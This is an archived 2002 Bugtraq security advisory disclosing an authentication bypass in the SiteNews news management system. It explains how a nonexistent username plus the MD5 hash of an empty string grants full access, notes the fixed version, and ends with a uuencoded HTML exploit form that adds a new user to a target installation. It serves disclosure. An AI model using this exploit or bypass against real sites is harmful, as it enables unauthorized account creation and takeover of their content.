The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Хинт: Ищите информацию по безопасности ? Рекомендую посмотреть раздел Защита информации каталога ссылок.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

SiteNews remote add user exploit


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Sat, 16 Feb 2002 18:46:35 +0100 (CET)
From: Ulf H{rnhammar <ulfh@update.uu.se>
To: bugtraq@securityfocus.com
Subject: SiteNews remote add user exploit

SiteNews remote add user exploit

PROGRAM: SiteNews
AUTHOR: JP Durman (jp@pgw.nl)
HOMEPAGE: http://www.linuxnetwork.nl/
VULNERABLE VERSIONS: 0.10 and 0.11 (possibly older versions as well)
TYPE: remote add user exploit
SEVERITY: high

DESCRIPTION:

SiteNews is an open-sourced system for displaying and managing news items on
websites. According to its homepage, it has been downloaded almost 4000 times.

ISSUE:

The function GetPassword in function.php returns an empty string, when you ask
for a non-existent username. This, together with the fact that the program
sends usernames in cleartext and passwords as MD5 sums, means that you can log
in without an account, by posting a non-existent username and the MD5 sum for
an empty string as the password. SiteNews has no concept of user levels, so
once you are in, you have full control over all news items and all users.

The author was contacted with an explanation, an exploit and a patch on the
5th of February. Version 0.12, which is not vulnerable, was released on the
7th of February.

RECOMMENDATION:

I recommend that all users upgrade to version 0.12 immediately.

EXPLOIT:

Here is my HTML exploit for this issue. It is uuencoded. You type in a non-
existent username and the user and password combination that you wish to add
to the system, and the exploit creates the new user for you, despite the fact
that you are not authorized.

// Ulf Harnhammar
metaur@prontomail.com


begin 644 sitenews_exploit.html
M/"%$3T-465!%($A434P@4%5"3$E#("(M+R]7,T,O+T141"!(5$U,(#0N,#$@
M5')A;G-I=&EO;F%L+R]%3B(*(FAT='`Z+R]W=W<N=S,N;W)G+U12+VAT;6PT
M+VQO;W-E+F1T9"(^"CQH=&UL/@H\:&5A9#X*/'1I=&QE/E-I=&5.97=S($5X
M<&QO:70@,"XQ/"]T:71L93X*/&UE=&$@:'1T<"UE<75I=CTB0V]N=&5N="U4
M>7!E(B!C;VYT96YT/2)T97AT+VAT;6P[(&-H87)S970]:7-O+3@X-3DM,2(^
M"CPO:&5A9#X*"CQB;V1Y(&)G8V]L;W(](B-F9F9F9F8B('1E>'0](B,P,#`P
M,#`B(&QI;FL](B,P,#`P,#`B(&%L:6YK/2(C,#`P,#`P(@IV;&EN:STB(S`P
M,#`P,"(^"CQH,3Y3:71E3F5W<R!%>'!L;VET(#`N,3PO:#$^"@H\9F]R;2!M
M971H;V0](E!/4U0B(&%C=&EO;CTB:'1T<#HO+W=W=RYV:6-T:6TN8V]M+W-I
M=&5N97=S+V%D;6EN+V%D9%]U<V5R+G!H<"(*96YC='EP93TB;75L=&EP87)T
M+V9O<FTM9&%T82(^"E=R:71T96X@8GD@/&$@:')E9CTB;6%I;'1O.FUE=&%U
M<D!P<F]N=&]M86EL+F-O;2(^56QF($@F875M;#MR;FAA;6UA<CPO83X@:6X*
M,C`P,BX\<#X*"E1H:7,@97AP;&]I="!W:6QL(&%D9"!A(&YE=R!U<V5R('1O
M(&$@4VET94YE=W,@:6YS=&%L;&%T:6]N+B!4:&4@97AP;&]I="!U<V5R"FES
M(&)A<VEC86QL>2!A;GD@;F]N+65X:7-T96YT('5S97(L('-O('EO=2!J=7-T
M('1Y<&4@<V]M92!R86YD;VT@8VAA<F%C=&5R<PIT:&5R92X\<#X*"D5X<&QO
M:70@=7-E<CH\8G(^"CQI;G!U="!T>7!E/2)T97AT(B!N86UE/2)U<V5R;F%M
M92(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4](FAI9&1E;B(@;F%M93TB
M<&%S<W=O<F0B"G9A;'5E/2)D-#%D.&-D.3AF,#!B,C`T93DX,#`Y.3AE8V8X
M-#(W92(@<VEZ93TB,"(^"CPA+2T@5&AI<R!I<R!T:&4@340U('-U;2!F;W(@
M86X@96UP='D@<W1R:6YG+B`M+3X*3F5W('5S97(Z/&)R/@H\:6YP=70@='EP
M93TB=&5X="(@;F%M93TB;F5W7W5S97(B('-I>F4](C(P(CX\8G(^"CQI;G!U
M="!T>7!E/2)H:61D96XB(&YA;64](F%C=&EO;C$B('9A;'5E/2(Q(B!S:7IE
M/2(P(CX*3F5W('!A<W-W;W)D.CQB<CX*/&EN<'5T('1Y<&4](G1E>'0B(&YA
M;64](FYE=U]P87-S=V]R9"(@<VEZ93TB,C`B/CQB<CX*/&EN<'5T('1Y<&4]
M(G-U8FUI="(@=F%L=64](D5X<&QO:70@:70B/@H\+V9O<FT^"@H\+V)O9'D^
)"CPO:'1M;#X*
`
end

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.